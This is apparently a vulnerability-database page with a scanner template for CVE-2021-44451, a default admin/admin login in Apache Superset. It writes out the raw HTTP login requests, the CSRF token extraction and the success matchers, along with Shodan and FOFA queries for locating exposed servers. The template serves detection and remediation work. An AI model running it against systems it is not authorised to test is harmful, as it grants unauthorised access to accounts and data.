| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2021-44451 | 1 Feb 202214:15 | – | attackerkb | |
| Apache Superset 安全漏洞 | 1 Feb 202200:00 | – | cnnvd | |
| Apache Superset Information Disclosure Vulnerability (CNVD-2022-14706) | 10 Feb 202200:00 | – | cnvd | |
| CVE-2021-44451 | 1 Feb 202213:16 | – | cve | |
| CVE-2021-44451 API sensitive information leak | 1 Feb 202213:16 | – | cvelist | |
| Insufficiently Protected Credentials in Apache Superset | 2 Feb 202200:01 | – | github | |
| CVE-2021-44451 | 1 Feb 202214:15 | – | nvd | |
| BIT-SUPERSET-2021-44451 API sensitive information leak | 5 Feb 202507:29 | – | osv | |
| GHSA-HHM3-48H2-597V Insufficiently Protected Credentials in Apache Superset | 2 Feb 202200:01 | – | osv | |
| PYSEC-2022-36 | 1 Feb 202214:15 | – | osv |
id: CVE-2021-44451
info:
name: Apache Superset <=1.3.2 - Default Login
author: dhiyaneshDK
severity: medium
description: |
Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations.
impact: |
An attacker can gain unauthorized access to the Apache Superset application.
remediation: Upgrade to Apache Superset 1.4.0 or higher.
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-44451
cwe-id: CWE-522
epss-score: 0.07863
epss-percentile: 0.93983
cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: apache
product: superset
shodan-query:
- http.favicon.hash:1582430156
- http.html:"apache superset"
fofa-query:
- body="apache superset"
- icon_hash=1582430156
tags: cve2021,cve,apache,superset,default-login,vuln
http:
- raw:
- |
GET /login/ HTTP/1.1
Host: {{Hostname}}
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
- |
GET /dashboard/list/ HTTP/1.1
Host: {{Hostname}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: header_2
words:
- 'session'
- type: word
part: body_3
words:
- 'DashboardFilterStateRestApi'
extractors:
- type: regex
name: csrf_token
group: 1
regex:
- 'name="csrf_token" type="hidden" value="(.*)"'
internal: true
part: body
# digest: 4a0a004730450220172e4f7c0793edd01ada528e6257a3023061df7d35d934fa618ae65721f6fe06022100c348500ffbdd32915a39a68bf8e25ba62c163e321b6a357fe2b94f456c002113:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation